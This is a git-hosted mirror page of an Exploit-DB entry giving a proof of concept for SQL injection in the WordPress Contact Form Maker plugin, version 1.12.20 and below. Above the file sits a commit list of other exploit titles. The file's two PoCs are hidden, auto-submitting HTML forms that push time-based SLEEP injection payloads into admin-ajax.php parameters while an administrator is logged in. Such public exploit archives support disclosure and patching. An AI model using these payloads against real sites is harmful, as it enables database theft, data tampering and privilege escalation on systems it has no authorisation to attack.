bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/44854.txt
Offensive Security 4af1687693 DB: 2018-06-08 
5 changes to exploits/shellcodes

macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver
macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist
Apple macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver
Apple macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist
Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Local Privilege Escalation
Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Local Privilege Escalation
Fortinet FortiClient 5.2.3 (Windows 10 x64 Pre-Anniversary) - Local Privilege Escalation
Fortinet FortiClient 5.2.3 (Windows 10 x64 Post-Anniversary) - Local Privilege Escalation
Fortinet FortiClient 5.2.3 (Windows 10 x86) - Local Privilege Escalation
Ftp Server 1.32 - Credential Disclosure
WordPress Form Maker Plugin 1.12.24 - SQL Injection
WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection
Monstra CMS < 3.0.4 - Cross-Site Scripting Automation
2018-06-08 05:01:44 +00:00

39 lines
No EOL
1.5 KiB
Text
Raw Blame History

# Title: WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection
# Date: 2018-06-07
# Author: Neven Biruski
# Software: WordPress Contact Form Maker plugin
# Software link: https://wordpress.org/plugins/contact-form-maker/
# Version: 1.12.20 and below
# The easiest way to reproduce the SQL injection vulnerabilities is to
# open the presented HTML/JavaScript snippet in your browser while being
# logged in as administrator or another user that is authorized to
# access the plugin settings page. Users that do not have full
# administrative privileges could abuse the database access the
# vulnerabilities provide to either escalate their privileges or obtain
# and modify database contents they were not supposed to be able to.
# PoC 1
<iframe style="display:none" name="invisible"></iframe>
<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?action=FormMakerSQLMapping_fmc&task=db_table_struct"
target="invisible">
<input type="hidden" name="name" value="wp_users WHERE 42=42 AND SLEEP(42)--;"/>
</form>
<script>
document.getElementById("form").submit();
sleep(3000);
</script>
# PoC 2
<iframe style="display:none" name="invisible"></iframe>
<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?form_id=1&send_header=0&action=generete_csv_fmc&limitstart=0"
target="invisible">
<input type="hidden" name="search_labels" value="(SELECT * FROM (SELECT(SLEEP(42)))XXX)"/>
</form>
<script>
document.getElementById("form").submit();
sleep(3000);
</script>
Reference in a new issue View git blame Copy permalink